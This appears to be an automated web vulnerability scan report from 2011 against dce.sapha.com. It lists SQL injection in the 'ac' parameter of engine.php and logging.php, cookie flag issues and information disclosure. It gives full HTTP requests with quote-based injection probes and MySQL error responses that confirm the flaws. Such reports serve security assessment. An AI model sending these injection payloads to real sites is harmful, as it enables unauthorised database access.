1.1. http://dce.sapha.com/engine.php [ac parameter]
1.2. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]
1.3. http://dce.sapha.com/logging.php [ac parameter]
2. Cookie scoped to parent domain
2.1. http://dce.sapha.com/logging.php
2.2. http://dce.sapha.com/logging.php
3. Cookie without HttpOnly flag set
3.1. http://dce.sapha.com/logging.php
3.2. http://dce.sapha.com/logging.php
4. Private IP addresses disclosed
5. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=2546' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:56:39 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQL ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=2546'' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:56:39 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: sapha_tst_2546''=TRUE; expires=Sat, 13-Mar-2021 18:56:39 GMT; path=/; domain=.sapha.com Vary: Accept-Encoding,User Connection: close Content-Type: application/x-javascript Content-Length: 5597 var SCS_tid=(SCS_tid)?escape ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=/1'2546 HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:56:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQ ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=/1''2546 HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:56:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=2546'&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:57:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQL ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br> ...[SNIP]... |
GET /logging.php?ac=2546''&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE |
HTTP/1.1 302 Found Date: Wed, 16 Mar 2011 18:57:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=1&NS_sw Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=57337 |
HTTP/1.1 302 Found Date: Wed, 16 Mar 2011 18:58:01 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_1_19=106744 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=2546&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=57335 |
HTTP/1.1 302 Found Date: Wed, 16 Mar 2011 18:55:19 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_2546_1=57337 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=1&NS_sw Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=57337 |
HTTP/1.1 302 Found Date: Wed, 16 Mar 2011 18:58:01 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_1_19=106744 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=2546&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.thinksubs User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=57335 |
HTTP/1.1 302 Found Date: Wed, 16 Mar 2011 18:55:19 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Cache-Control: private Set-Cookie: sapha_2546_1=57337 Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=106950 |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 19:30:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 412 </td></tr></table><b ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=106950 |
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 19:30:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 412 </td></tr></table><b ...[SNIP]... |